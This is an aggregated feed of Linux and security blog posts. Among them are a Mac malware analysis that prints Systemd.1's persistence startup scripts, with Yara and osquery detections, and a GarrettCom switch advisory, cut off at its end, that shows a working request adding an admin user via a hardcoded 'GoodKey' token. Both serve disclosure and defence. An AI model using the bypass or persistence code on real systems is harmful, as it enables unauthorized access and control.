First off is a straightforward “install” of Raspbian on your MicroSD card. In my case, I used dd to image the img file from Raspbian to a MicroSD card in a card reader.

dd if=/home/david/Downloads/2017-04-10-raspbian-jessie-lite.img of=/dev/sde bs=1M conv=fdatasync
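If you want to sanity-check the write afterwards, cmp can compare the image against what landed on the card, byte for byte. The sketch below demonstrates the idea on temporary files; on real hardware you would replace the destination with your block device (e.g. /dev/sde):

```shell
# Demo of verifying a raw copy byte-for-byte with cmp.
# On real hardware the destination would be the block device (e.g. /dev/sde).
src=$(mktemp); dst=$(mktemp)
head -c 1048576 /dev/urandom > "$src"          # stand-in for the .img file
dd if="$src" of="$dst" bs=64K conv=fdatasync 2>/dev/null
# Compare only as many bytes as the image contains (a real device is larger).
cmp -n "$(stat -c%s "$src")" "$src" "$dst" && echo "verified"
```

The `-n` limit matters on a real card: the device is bigger than the image, so an unlimited cmp would always report a difference past the end of the image.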

Mount the /boot partition

You’ll want to mount the boot partition to make a couple of changes. Before doing so, run partprobe to re-read the partition tables (or unplug and replug the SD card). Then mount the partition somewhere convenient.

mount /dev/sde1 /mnt/boot

Edit /boot/config.txt

To use the USB port as an OTG port, you’ll need to enable the dwc2 device tree overlay. This is accomplished by adding a line to /boot/config.txt with dtoverlay=dwc2.

vim /mnt/boot/config.txt
(append dtoverlay=dwc2)

Edit /boot/cmdline.txt

Now we’ll need to tell the kernel to load the right module for the serial OTG support. Open /boot/cmdline.txt, and after rootwait, add modules-load=dwc2,g_serial.

vim /mnt/boot/cmdline.txt
(insert modules-load=dwc2,g_serial after rootwait)

When you save the file, make sure it is all one line; if you have any line-wrapping options enabled, they may have inserted newlines into the file.
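A quick way to check is to count lines, since the kernel only reads the first one. The snippet below demonstrates the check on a sample file (the cmdline contents shown are illustrative); on the real card you would point it at /mnt/boot/cmdline.txt:

```shell
# Verify cmdline.txt is a single line; the kernel ignores anything after it.
# Demonstrated here on a sample file with typical Raspbian parameters.
f=$(mktemp)
printf 'console=tty1 root=/dev/mmcblk0p2 rootwait modules-load=dwc2,g_serial\n' > "$f"
if [ "$(wc -l < "$f")" -le 1 ]; then
    echo "OK: single line"
else
    echo "ERROR: cmdline.txt spans multiple lines"
fi
```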

Mount the root (/) partition

Let’s switch the partition we’re dealing with.

umount /mnt/boot
mount /dev/sde2 /mnt/root

Enable a Console on /dev/ttyGS0

/dev/ttyGS0 is the serial port on the USB gadget interface. While we’ll get a serial port, we won’t have a console on it unless we tell systemd to start a getty (the process that handles login and starts shells) on the USB serial port. This is as simple as creating a symlink:

ln -s /lib/systemd/system/getty@.service /mnt/root/etc/systemd/system/getty.target.wants/getty@ttyGS0.service

This asks systemd to start a getty on ttyGS0 on boot.

Unmount and boot your Pi Zero

Unmount your SD card, insert the micro SD card into a Pi Zero, and boot with a Micro USB cable between your computer and the OTG port.

Connect via a terminal emulator

You can connect via the terminal emulator of your choice at 115200bps. The Pi Zero shows up as a “Netchip Technology, Inc. Linux-USB Serial Gadget (CDC ACM mode)”, which means that (on Linux) your device will typically be /dev/ttyACM0.

screen /dev/ttyACM0 115200


This is a quick way to get a console on a Raspberry Pi Zero, but it has downsides:

  • Provides only console, no networking.
  • File transfers are “difficult”.

21 May, 2017 07:00AM

May 20, 2017

hackergotchi for VyOS


VyOS 1.2.0 repository re-structuring

In preparation for the new 1.2.0 (jessie-based) beta release, we are re-populating the package repositories. The old repositories are now archived; you can still find them in the /legacy/repos directory on

The purpose of this is two-fold. First, the old repo got quite messy, and Debian people (rightfully!) keep reminding us about it, but it would be difficult to do a gradual cleanup. Second, since the CI server has moved, and so did the build hosts, we need to test how well the new procedures are working. And, additionally, it should tell us if we are prepared to restore VyOS from its source should anything happen to the server or its contents.

For perhaps a couple of days, there will be no new nightly builds, and you will not be able to build ISOs yourself, unless you change the repo path in ./configure options by hand. Stay tuned.

20 May, 2017 12:38PM by Daniil Baturin

May 19, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Nish Aravamudan: usd has been renamed to git-ubuntu

After some internal bikeshedding, we decided to rework the tooling that the Server Team has been working on for git-based source package management. The old tool was usd (Ubuntu Server Dev), as it stemmed from a Canonical Server sprint in Barcelona last year. That name is confusing (acronyms that aren’t obvious are never good) and really the tooling had evolved to be a git wrapper.

So, we renamed everything to be git-ubuntu. Since git is awesome, that means git ubuntu also works as long as git-ubuntu is in your $PATH. The snap (previously usd-nacc) has been deprecated in favor of git-ubuntu (it still exists, but if you try to run, e.g., usd-nacc.usd you are told to install the git-ubuntu snap). To get it, use:

sudo snap install --classic git-ubuntu

We are working on some relatively big changes to the code-base to release next week:

  1. Empty directory support (LP: #1687057). My colleague Robie Basak implemented a workaround for upstream git not being able to represent empty directories.
  2. Standardizing (internal to the code) how the remote(s) work and what refspecs are used to fetch from them.

Along with those architectural changes, one big functional shift is to using git-config to store some metadata about the user (specifically, the Launchpad user name to use, in ~/.gitconfig) and the command used to create the repository (specifically, the source package name, in <dir>/.git/config). I think this actually ends up being quite clean from an end-user perspective, and it means our APIs and commands are easier to use, as we can just lookup this information from git-config when using an existing repository.
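As a sketch of that pattern (the key names below are hypothetical, not necessarily the ones git-ubuntu actually uses): values set with --global land in ~/.gitconfig, while repository-scoped values land in <dir>/.git/config, and any later command can look them up instead of re-asking the user.

```shell
# Hypothetical keys illustrating metadata storage via git-config.
set -e
repo=$(mktemp -d)
git init -q "$repo"
cd "$repo"

# Repository-scoped metadata ends up in <dir>/.git/config ...
git config gitubuntu.srcpkg hello

# ... and can be looked up later with a single query:
git config --get gitubuntu.srcpkg    # prints: hello
```

The nice property is that git handles the file format, scoping, and precedence (repo config overrides ~/.gitconfig) for free.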

As always, the latest code is at:

19 May, 2017 10:45PM

Ubuntu Insights: Visual Studio Code is now available as a snap on Ubuntu

There is a new desktop snap in the Snap store: Visual Studio Code.

A versatile and open source code editor

Launched in 2015 by Microsoft, Visual Studio Code has established itself as one of the preferred code editors in the developer community. Cross-platform (powered by Electron), it features a marketplace of more than 3,000 extensions where any language can find its linters, debuggers and test runners.

To install Visual Studio Code as a snap:

sudo snap install --classic vscode

How has VS Code made such a splash in the development world?

After barely two years, this editor has found a place in a lot of tool belts, on Linux too. To explain this success, here are some notable highlights:

  • smart completion based on types and functions
  • a versatile integrated debugger
  • git built-in support with an approachable user interface for git commands
  • and of course, extensions support

Git integration in Visual Studio Code features delightful commit (and reverts!) management.

To make the experience more familiar, you can emulate keyboard shortcuts of other editors by installing alternative keymaps, such as Vim, Emacs, Sublime, etc.

Available as a snap for an agile release process

It’s not the first code editor featured in this Electron snaps blog series, and if you have been reading the other entries, you already know why snaps are a good fit for Electron distribution on Linux: auto-updates, ease of installation and dependency bundling.

This snap makes the latest version of Visual Studio Code easily installable and auto-updatable on Ubuntu 14.04, 16.04 and newer supported releases, goodbye 3rd party PPAs and general package hunting!

Releases for everyone and releases for testers

Snaps allow developers to release software in different “channels”, that users subscribe to (defaulting to the stable channel), in order to receive automated updates.

Four channels are available, with names hinting at the stability users can expect:

  • edge is for QA, testers and adventurous adopters
  • beta is where versions from the edge channel are moved to when they pass some level of testing and QA
  • candidate is commonly used for frozen pre-release versions
  • stable is what users install by default (the snap install <snap name> command without any options) and is expected to only contain stable software. This is also the channel that enables snaps to appear in search results of the snap find command.

For a primer on using the snap command-line, this tutorial will show you the way.

19 May, 2017 07:03PM by Ubuntu Insights

hackergotchi for AlienVault OSSIM

AlienVault OSSIM

Diversity in Recent Mac Malware

In recent weeks, there have been some high-profile reports about Mac malware, most notably OSX/Dok and OSX.Proton.B. Dok malware made headlines due to its unique ability to intercept all web traffic, while Proton.B gained fame when attackers replaced legitimate versions of HandBrake with an infected version on the vendor’s download site. Another lower profile piece of Mac malware making the rounds is Mac.Backdoor.Systemd.1.

Figure 1: Systemd pretending to be corrupted and un-runnable.

There have been no public reports as to who is behind these attacks and little information about their targets. OSX/Dok is reported to have targeted European victims, while users of HandBrake were the victims of Proton.B. One corporate victim of Proton.B was Panic, Inc., which had its source code stolen and received a ransom demand from the attackers.

Each of these malware variants is designed to take advantage of Macs, but analysis shows that they are actually drastically different from each other, showing just how diverse the Mac malware space has grown. Let’s dive into some of the technical details (but not too technical ;)) of each piece of malware to learn more about what they do and how they work.

|                     | OSX/Dok | OSX.Proton.B | Mac.BackDoor.Systemd.1 |
|---------------------|---------|--------------|------------------------|
| Functionality       | HTTP(S) proxy | Credential theft (potentially other RAT functionality) | Backdoor/RAT |
| Language            | Objective-C (with heavy use of shell commands) | Objective-C (with heavy use of shell commands) | C++ (with a handful of shell commands) |
| Persistence         | Launch Agent | Launch Agent | Launch Agent; Launch Daemon; Startup Item; uses chflags to make files read-only |
| Infection Vector    | Phishing emails | Compromised software download | (presumably) Phishing |
| Anti-Analysis       | – | Anti-debugger (PT_DENY_ATTACH); closes Terminal and Wireshark windows | – |
| Binary Obfuscation  | Newer variants are packed with UPX | Password protected zip archive; encrypted configuration file | Encrypted configuration file; XOR encrypted strings in binary |
| Detection Avoidance | Signed App bundle; installs trusted root certificate; modifies sudo settings to prevent prompting | Checks for security software; infected legitimate software; use of “hidden” dot files | Uses chflags to hide files from UI; use of “hidden” dot files |
| C2                  | MiTM proxy (no separate C2) | HTTPS | Custom 3DES |


Dok is very basic in its functionality – it reconfigures a system to proxy web traffic through a malicious host. It does this by installing Tor and changing web proxy settings to hijack web traffic in order to steal credentials or even alter content. There is no need for the victim's machine to communicate with a command and control server since the malicious proxy server already has access to the information it's trying to steal.

Proton.B might be a slimmed down version of Proton.A which contains a full-featured suite of RAT functionalities. However, while Proton.B is reported to have only basic credential stealing capabilities, it does have the capability to run arbitrary commands from its configuration file. The decrypted configuration file also shows hints of other capabilities, such as grabbing screenshots and SSH tunneling. Proton.B is also able to steal credentials by collecting them from keychains, password vaults, and web browsers. The credentials are then exfiltrated over HTTPS.

Systemd.1 is a basic backdoor/RAT that waits for commands from a command and control server. This backdoor is able to either listen on a network socket for an incoming C&C connection or make its own connection to a C&C. Commands from the C&C allow attackers to do things like: run arbitrary commands, perform file system operations, update the backdoor software, update the C&C server, and install plugins.

Language and Distribution

Windows malware often comes in a variety of formats – ranging from office documents, script files, executables, or malicious PDFs just to name a few. In contrast, Mac malware tends to have much less variation and most often shows up as a Mach-O executable, zipped app bundle, or DMG file. There has been a recent case of malicious Office documents targeting Macs and back in 2012 AlienVault also reported on Office documents targeting Macs, but those are exceptions to the norm.

Dok is distributed as a zipped app bundle written in Objective-C, but also uses a shell script to perform critical functionality. The zipped app bundle is typically sent as an attachment to a phishing email and requires the victim to execute the application.

Proton.B is also written in Objective-C, but the malicious code is distributed with the popular video transcoding tool HandBrake. Proton.B uses HandBrake to bootstrap loading of its own code and tricks victims into entering in their password by presenting a fake authentication prompt.

Systemd.1 is different from Dok and Proton in that it is written in C++. We’re not sure of its initial infection vector, but we can posit that it is via phishing since the samples[1] in VirusTotal are often named “Confidential_Data”. It is possible that the Systemd.1 Mach-O is distributed along with an app bundle, but we have not discovered that link yet. (As a side note, we’ve previously looked at another piece of C++ Mac malware, OceanLotus, and Systemd.1 does some similar things like decrypting XOR encrypted strings in __mod_init, however, Systemd.1 has fewer features.)

Figure 2. Systemd XOR decrypting strings


Even though there are several ways that malware can persist on Macs, we find that most choose to use launch agents and launch daemons. Here, Dok and Proton use launch agents while Systemd.1 uses both agent and daemon. To make things extra sticky, Systemd.1 also uses the deprecated Startup Items feature in OSX and drops files in /Library/StartupItems.

/Library/StartupItems/sysetmd/StartupParameters.plist will contain the following text:

{
    Description = "Start systemd";
    Provides = ("system");
    Requires = ("Network");
    OrderPreference = "None";
}

And /Library/StartupItems/sysetmd/sysetmd will look like:

. /etc/rc.common

StartService (){
    ConsoleMessage "Start system Service"
    /Library/sysetmd d
}

StopService (){
    return 0
}

RestartService (){
    return 0
}

RunService "$1"

Systemd.1 also makes it slightly harder to remove the malware by using the “chflags” command to make files read-only.

Anti-Analysis, Binary Obfuscation and Detection Avoidance

Initial samples of Dok did not have any obfuscation or anti-analysis code; however, newer variants are being packed with UPX. In order to suppress security prompts from the operating system, Dok was cryptographically signed by a valid developer. Furthermore, Dok installs a malicious trusted root certificate so that web browsers won’t alert users that their HTTPS traffic is being intercepted by a proxy.

Figure 3. Dok signed with a legitimate certificate

Proton.B attempts to thwart analysis by preventing debuggers from attaching to it (though this can be easily bypassed). It also kills Terminal and Wireshark processes – both of which would be used by someone who wanted to analyze the malware. As previously mentioned, Proton.B was distributed with a modified version of HandBrake. Modified versions extract the core Proton.B binary from a password protected (encrypted) zip file. Although the Proton.B executable itself is not obfuscated, its configuration file is encrypted. Once executed, Proton.B checks for the presence of popular security software Little Snitch, Radio Silence and HandsOff – if present, it stops running. Popular in *nix-based malware, Proton.B also uses “hidden” dot files to make it harder to see.

Systemd.1 does not have any anti-debugging measures, but does XOR encrypt several strings in the binary. These strings are decrypted at runtime along with a 3DES encrypted configuration file. Systemd.1 also uses hidden dot files and directories, but goes one step further and hides files with the “chflags hidden” command.
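As an illustration of the string-hiding technique (a generic sketch, not Systemd.1’s actual routine — the key and string below are hypothetical), single-byte XOR is symmetric, so the same function both hides and recovers a string:

```python
def xor_crypt(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying the same key twice restores the input."""
    return bytes(b ^ key for b in data)

# Hypothetical key and string, for demonstration only.
key = 0x5A
hidden = xor_crypt(b"/Library/sysetmd", key)   # what would sit in the binary
print(xor_crypt(hidden, key))                  # b'/Library/sysetmd'
```

This is exactly why such strings are easy to recover once the key is found: decryption is one pass over the bytes, which is what you see happening in the malware’s __mod_init routines.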


As you can see, these three pieces of malware are distinct from each other in their approaches and illustrate the diversity of Mac malware variants that have surfaced in just the past few weeks. One can only expect the diversity to increase in the future. In particular, we’d expect future Mac malware to utilize more anti-analysis and obfuscation techniques since there is a lot of low hanging fruit on that front.

If you want to find out more about these malware variants, here are some of the pulses we have in our Open Threat Exchange (OTX):


There are many ways to detect the presence of these and other Mac-based malware variants in your environment. We’ve included some of those methods.

Yara rules

You can use the rules below in any system that supports Yara to detect these Mac-based malware variants.

rule mac_bd_systemd
{
    meta:
        author = "AlienVault Labs"
        type = "malware"
        description = "Mac.Backdoor.Systemd.1"

    strings:
        $c1 = "This file is corrupted and connot be opened"
        $c2 = ""
        $c3 = ";chflags hidden"
        $c4 = "%keymod%"
        $c5 = "* *-<4=w"

    condition:
        3 of ($c*)
}

rule osx_proton_b
{
    meta:
        author = "AlienVault Labs"
        type = "malware"
        description = "OSX/Proton.B"

    strings:
        $c1 = "%@/%@%@%@%@%@"
        $c2 = { 2e 00 68 00 61 00 73 00 } // . h a s
        $c3 = "Network Configuration needs to update DHCP settings. Type your password to allow this."
        $c4 = "root_password"
        $c5 = "decryptData:withPassword:error:"
        $c6 = "-----BEGIN PUBLIC KEY-----"
        $c7 = "ssh_user"

    condition:
        5 of ($c*)
}

rule osx_dok
{
    meta:
        author = "AlienVault Labs"
        type = "malware"
        description = "OSX/Dok"

    strings:
        $c1 = "/usr/local/bin/brew"
        $c2 = "/usr/local/bin/tor"
        $c3 = "/usr/local/bin/socat"
        $c4 = "killall Safari"
        $c5 = "killall \"Google Chrome\""
        $c6 = "killall firefox"
        $c7 = "security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain %@"

    condition:
        all of them
}



The osquery project already has some rules for Dok and Proton which you can find here:

For Systemd, you can add the following queries:


"platform": "darwin",

"version": "1.4.5",

"queries": {

"Systemd_Files": {

"query" : "select * from file \

where path like '/Library/StartupItems/sysetmd/StartupParameters.plist' OR \

path like '/Library/StartupItems/sysetmd/sysetmd' OR \

path like '/Library/sysetmd' OR \

& path like '/Users/%/Library/sysetmd' OR \

path like '/private/tmp/.systemd/systemd.lock%' OR \

path like '/private/var/root/.local/.systemd/systemd.uniq%';",

"interval" : "3600",

"description" : "Mac.BackDoor.Systemd",

& "value" : "Artifacts created by this malware"


"Systemd_Launch": {

"query" : "select * from launchd where name like '';",

"interval" : "3600",

"description" : "SystemD Launch Agent/Daemon",

"value" : "Artifact used by this malware"





Hashes for Mac.Backdoor.Systemd.1:

6b379289033c4a17a0233e874003a843cd3c812403378af68ad4c16fe0d9b9c4
37152cfcfb9b33531696624d8d345feb894b5b4edd8af2c63a71e91072abe1ad
c549c83577c294cc1323ca94e848389fce25510647ec5212fa2276de081771ca
3f71b6b994eabbc32a63eac14e9abd7b6cd26c37ed0baacbfbe62032c5930a40
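A minimal sketch of checking local files against these IOCs — the hash set is copied from the list above; which paths you scan is up to you:

```python
import hashlib

# SHA-256 IOCs for Mac.Backdoor.Systemd.1, from the list above.
SYSTEMD_IOCS = {
    "6b379289033c4a17a0233e874003a843cd3c812403378af68ad4c16fe0d9b9c4",
    "37152cfcfb9b33531696624d8d345feb894b5b4edd8af2c63a71e91072abe1ad",
    "c549c83577c294cc1323ca94e848389fce25510647ec5212fa2276de081771ca",
    "3f71b6b994eabbc32a63eac14e9abd7b6cd26c37ed0baacbfbe62032c5930a40",
}

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large binaries are not loaded into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def is_ioc(path: str) -> bool:
    """True if the file's SHA-256 matches a known Systemd.1 sample."""
    return sha256_of(path) in SYSTEMD_IOCS
```

Hash matching only catches these exact samples, of course; the Yara and osquery rules above cast a wider net.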

19 May, 2017 07:00PM

hackergotchi for Ubuntu developers

Ubuntu developers

José Antonio Rey: Social Media Management vs. Community Management?

I personally stopped blogging a while ago, but I kinda feel this is a necessary blog post. A while ago, a professor used the term Community Manager interchangeably with Social Media Manager. I made a quick comment about them not being the same, and later some friends started questioning my reasoning.

Last week during OSCON, I was chatting with a friend about this same topic. A startup asked me to help them as a community manager about a year ago. I gladly accepted, but then they just started assigning me social media work.

And these are not the only cases. I have seen several people use both terms interchangeably, even though they are not interchangeable. I guess it’s time for me to burst the bubble that has been wrapped around both terms.

In order to do that, let’s explain, in very simple words, the job of both of them. Let’s start with the social media managers. Their job is, as the title says, to manage social media channels: post on Facebook, respond to Twitter replies, make sure people feel welcome when they visit any of the social media channels, and, in general, represent the brand/product through social media.

Community managers, on the other hand, focus on building communities around a product or service. To put it simply, they make sure that there are people who care about the product, who contribute to the ecosystem, and who work with the provider to make it better. Social media management is a part of their job. It is a core function, because it is one of the channels that allow them to communicate with people, hear their concerns, and project the provider’s voice about the product. However, it is not their only job. They also have to go out and meet people in real life. Talk with higher-ups to voice the concerns. Hear how the product is impacting people’s lives in order to make a change, or to continue on the same good path.

With this, I’m not trying to devalue the work of social media managers. On the contrary, they have a very valuable job. Imagine all those companies with social media profiles without the funny comments, and with no message replies if you had a question. Horrible, right? Managing these channels is just as important, since it keeps brands/products ‘alive’ on the interwebs. But being a community manager is not only managing a channel. Therefore, they are not comparable jobs.

Each of the positions is different, even though they complement each other pretty well. But I hope that with this post you can understand a little bit more about the inside job of both community managers and social media managers. In a fast-paced world like ours today, these two can make a huge difference between having a presence online, or not. So, next time, if you’re looking for a community manager, don’t expect them to do only social media work. And viceversa – if you’re looking for a social media manager, don’t expect them to build community out of social media.

19 May, 2017 05:02PM

Martin Pitt: Cockpit is now in Ubuntu backports

Hot on the heels of landing Cockpit in Debian unstable and Ubuntu 17.04, the Ubuntu backport request got approved (thanks Iain!), which means that installing cockpit on Ubuntu 16.04 LTS or 16.10 is now also a simple apt install cockpit away. I updated the installation instructions accordingly.

Enjoy, and let us know about problems!

19 May, 2017 02:49PM

hackergotchi for Grml developers

Grml developers

Michael Prokop: Debian stretch: changes in util-linux #newinstretch

We’re coming closer to the Debian/stretch stable release and similar to what we had with #newinwheezy and #newinjessie it’s time for #newinstretch!

Hideki Yamane already started the game by blogging about GitHub’s Icon font, fonts-octicons and Arturo Borrero Gonzalez wrote a nice article about nftables in Debian/stretch.

One package that isn’t new but whose tools are used by many of us is util-linux, providing many essential system utilities. We have util-linux v2.25.2 in Debian/jessie and in Debian/stretch there will be util-linux >=v2.29.2. There are many new options available, and we also have a few new tools.

Tools that have been taken over from other packages

  • last: used to be shipped via sysvinit-utils in Debian/jessie
  • lastb: used to be shipped via sysvinit-utils in Debian/jessie
  • mesg: used to be shipped via sysvinit-utils in Debian/jessie
  • mountpoint: used to be shipped via initscripts in Debian/jessie
  • sulogin: used to be shipped via sysvinit-utils in Debian/jessie

New tools

  • lsipc: show information on IPC facilities, e.g.:
  • root@ff2713f55b36:/# lsipc
    RESOURCE DESCRIPTION                                              LIMIT USED  USE%
    MSGMNI   Number of message queues                                 32000    0 0.00%
    MSGMAX   Max size of message (bytes)                               8192    -     -
    MSGMNB   Default max size of queue (bytes)                        16384    -     -
    SHMMNI   Shared memory segments                                    4096    0 0.00%
    SHMALL   Shared memory pages                       18446744073692774399    0 0.00%
    SHMMAX   Max size of shared memory segment (bytes) 18446744073692774399    -     -
    SHMMIN   Min size of shared memory segment (bytes)                    1    -     -
    SEMMNI   Number of semaphore identifiers                          32000    0 0.00%
    SEMMNS   Total number of semaphores                          1024000000    0 0.00%
    SEMMSL   Max semaphores per semaphore set.                        32000    -     -
    SEMOPM   Max number of operations per semop(2)                      500    -     -
    SEMVMX   Semaphore max value                                      32767    -     -
  • lslogins: display information about known users in the system, e.g.:
    root@ff2713f55b36:/# lslogins
      UID USER     PROC PWD-LOCK PWD-DENY LAST-LOGIN GECOS
        0 root        2        0        1            root
        1 daemon      0        0        1            daemon
        2 bin         0        0        1            bin
        3 sys         0        0        1            sys
        4 sync        0        0        1            sync
        5 games       0        0        1            games
        6 man         0        0        1            man
        7 lp          0        0        1            lp
        8 mail        0        0        1            mail
        9 news        0        0        1            news
       10 uucp        0        0        1            uucp
       13 proxy       0        0        1            proxy
       33 www-data    0        0        1            www-data
       34 backup      0        0        1            backup
       38 list        0        0        1            Mailing List Manager
       39 irc         0        0        1            ircd
       41 gnats       0        0        1            Gnats Bug-Reporting System (admin)
      100 _apt        0        0        1            
    65534 nobody      0        0        1            nobody
  • lsns: list system namespaces, e.g.:
    root@ff2713f55b36:/# lsns
            NS TYPE NPROCS PID USER COMMAND
    4026531835 cgroup      2   1 root bash
    4026531837 user        2   1 root bash
    4026532473 mnt         2   1 root bash
    4026532474 uts         2   1 root bash
    4026532475 ipc         2   1 root bash
    4026532476 pid         2   1 root bash
    4026532478 net         2   1 root bash
  • setpriv: run a program with different privilege settings
  • zramctl: tool to quickly set up zram device parameters, to reset zram devices, and to query the status of used zram devices

New features/options

blkdiscard (discard the content of sectors on a device):

-p, --step <num>    size of the discard iterations within the offset
-z, --zeroout       zero-fill rather than discard

chrt (show or change the real-time scheduling attributes of a process):

-d, --deadline            set policy to SCHED_DEADLINE
-T, --sched-runtime <ns>  runtime parameter for DEADLINE
-P, --sched-period <ns>   period parameter for DEADLINE
-D, --sched-deadline <ns> deadline parameter for DEADLINE

fdformat (do a low-level formatting of a floppy disk):

-f, --from <N>    start at the track N (default 0)
-t, --to <N>      stop at the track N
-r, --repair <N>  try to repair tracks failed during the verification (max N retries)

fdisk (display or manipulate a disk partition table):

-B, --protect-boot            don't erase bootbits when creating a new label
-o, --output <list>           output columns
    --bytes                   print SIZE in bytes rather than in human readable format
-w, --wipe <mode>             wipe signatures (auto, always or never)
-W, --wipe-partitions <mode>  wipe signatures from new partitions (auto, always or never)

New available columns (for -o):

 gpt: Device Start End Sectors Size Type Type-UUID Attrs Name UUID
 dos: Device Start End Sectors Cylinders Size Type Id Attrs Boot End-C/H/S Start-C/H/S
 bsd: Slice Start End Sectors Cylinders Size Type Bsize Cpg Fsize
 sgi: Device Start End Sectors Cylinders Size Type Id Attrs
 sun: Device Start End Sectors Cylinders Size Type Id Flags

findmnt (find a (mounted) filesystem):

-J, --json             use JSON output format
-M, --mountpoint <dir> the mountpoint directory
-x, --verify           verify mount table content (default is fstab)
    --verbose          print more details

flock (manage file locks from shell scripts):

-F, --no-fork            execute command without forking
    --verbose            increase verbosity

getty (open a terminal and set its mode):

--reload               reload prompts on running agetty instances

hwclock (query or set the hardware clock):

--get            read hardware clock and print drift corrected result
--update-drift   update drift factor in /etc/adjtime (requires --set or --systohc)

ldattach (attach a line discipline to a serial line):

-c, --intro-command <string>  intro sent before ldattach
-p, --pause <seconds>         pause between intro and ldattach

logger (enter messages into the system log):

-e, --skip-empty         do not log empty lines when processing files
    --no-act             do everything except the write the log
    --octet-count        use rfc6587 octet counting
-S, --size <size>        maximum size for a single message
    --rfc3164            use the obsolete BSD syslog protocol
    --rfc5424[=<snip>]   use the syslog protocol (the default for remote);
                           <snip> can be notime, or notq, and/or nohost
    --sd-id <id>         rfc5424 structured data ID
    --sd-param <data>    rfc5424 structured data name=value
    --msgid <msgid>      set rfc5424 message id field
    --socket-errors[=<on|off|auto>] print connection errors when using Unix sockets

losetup (set up and control loop devices):

-L, --nooverlap               avoid possible conflict between devices
    --direct-io[=<on|off>]    open backing file with O_DIRECT 
-J, --json                    use JSON --list output format

New available --list column:

DIO  access backing file with direct-io

lsblk (list information about block devices):

-J, --json           use JSON output format

New available columns (for --output):

HOTPLUG  removable or hotplug device (usb, pcmcia, ...)
SUBSYSTEMS  de-duplicated chain of subsystems

lscpu (display information about the CPU architecture):

-y, --physical          print physical instead of logical IDs

New available column:

DRAWER  logical drawer number

lslocks (list local system locks):

-J, --json             use JSON output format
-i, --noinaccessible   ignore locks without read permissions

nsenter (run a program with namespaces of other processes):

-C, --cgroup[=<file>]      enter cgroup namespace
    --preserve-credentials do not touch uids or gids
-Z, --follow-context       set SELinux context according to --target PID

rtcwake (enter a system sleep state until a specified wakeup time):

--date <timestamp>   date time of timestamp to wake
--list-modes         list available modes

sfdisk (display or manipulate a disk partition table):

New Commands:

-J, --json <dev>                  dump partition table in JSON format
-F, --list-free [<dev> ...]       list unpartitioned free areas of each device
-r, --reorder <dev>               fix partitions order (by start offset)
    --delete <dev> [<part> ...]   delete all or specified partitions
--part-label <dev> <part> [<str>] print or change partition label
--part-type <dev> <part> [<type>] print or change partition type
--part-uuid <dev> <part> [<uuid>] print or change partition uuid
--part-attrs <dev> <part> [<str>] print or change partition attributes

New Options:

-a, --append                   append partitions to existing partition table
-b, --backup                   backup partition table sectors (see -O)
    --bytes                    print SIZE in bytes rather than in human readable format
    --move-data[=<typescript>] move partition data after relocation (requires -N)
    --color[=<when>]           colorize output (auto, always or never)
                               colors are enabled by default
-N, --partno <num>             specify partition number
-n, --no-act                   do everything except write to device
    --no-tell-kernel           do not tell kernel about changes
-O, --backup-file <path>       override default backup file name
-o, --output <list>            output columns
-w, --wipe <mode>              wipe signatures (auto, always or never)
-W, --wipe-partitions <mode>   wipe signatures from new partitions (auto, always or never)
-X, --label <name>             specify label type (dos, gpt, ...)
-Y, --label-nested <name>      specify nested label type (dos, bsd)

Available columns (for -o):

 gpt: Device Start End Sectors Size Type Type-UUID Attrs Name UUID
 dos: Device Start End Sectors Cylinders Size Type Id Attrs Boot End-C/H/S Start-C/H/S
 bsd: Slice Start  End Sectors Cylinders Size Type Bsize Cpg Fsize
 sgi: Device Start End Sectors Cylinders Size Type Id Attrs
 sun: Device Start End Sectors Cylinders Size Type Id Flags

swapon (enable devices and files for paging and swapping):

-o, --options <list>     comma-separated list of swap options

New available columns (for --show):

UUID   swap uuid
LABEL  swap label

unshare (run a program with some namespaces unshared from the parent):

-C, --cgroup[=<file>]                              unshare cgroup namespace
    --propagation slave|shared|private|unchanged   modify mount propagation in mount namespace
-s, --setgroups allow|deny                         control the setgroups syscall in user namespaces

Deprecated / removed options

sfdisk (display or manipulate a disk partition table):

-c, --id                  change or print partition Id
    --change-id           change Id
    --print-id            print Id
-C, --cylinders <number>  set the number of cylinders to use
-H, --heads <number>      set the number of heads to use
-S, --sectors <number>    set the number of sectors to use
-G, --show-pt-geometry    deprecated, alias to --show-geometry
-L, --Linux               deprecated, only for backward compatibility
-u, --unit S              deprecated, only sector unit is supported

19 May, 2017 08:42AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption


Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT (Magnum) series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that GarrettCom undertake a full whitebox security assessment of these switches.

The version under test was indicated as 4.6.0. Belden Garrettcom released an advisory on 8 May 2017, indicating that the issues were fixed in release 4.7.7.

This is a local copy of an advisory posted to the Full Disclosure mailing list.

GarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token

Severity: High

The string “GoodKey” can be used in place of a session token for the web interface, allowing a complete bypass to all web interface authentication. The following request/response demonstrates adding a user ‘gibson’ with the password ‘god’ on any GarrettCom 6K or 10K switch.

GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

HTTP/1.0 200 OK
Server: GoAhead-Webs
Content-Type: text/html

<?xml version='1.0' encoding='UTF-8'?><data val="users"><changed val="yes" />
<helpfile val="user_accounts.html" />
<user uid="operator" access="Operator" />
<user uid="manager" access="Manager" />
<user uid="gibson" access="Manager" />

GarrettCom-02 - Secrets Accessible to All Users

Severity: High

Unprivileged but authenticated users (“operator” level access) can view the plaintext passwords of all users configured on the system, allowing them to escalate privileges to “manager” level. While the default “show config” masks the passwords, executing “show config saved” includes the plaintext passwords. The value of the “secrets” setting does not affect this.

6K>show config group=user saved
#User Management#
add user=gibson level=2 pass=god

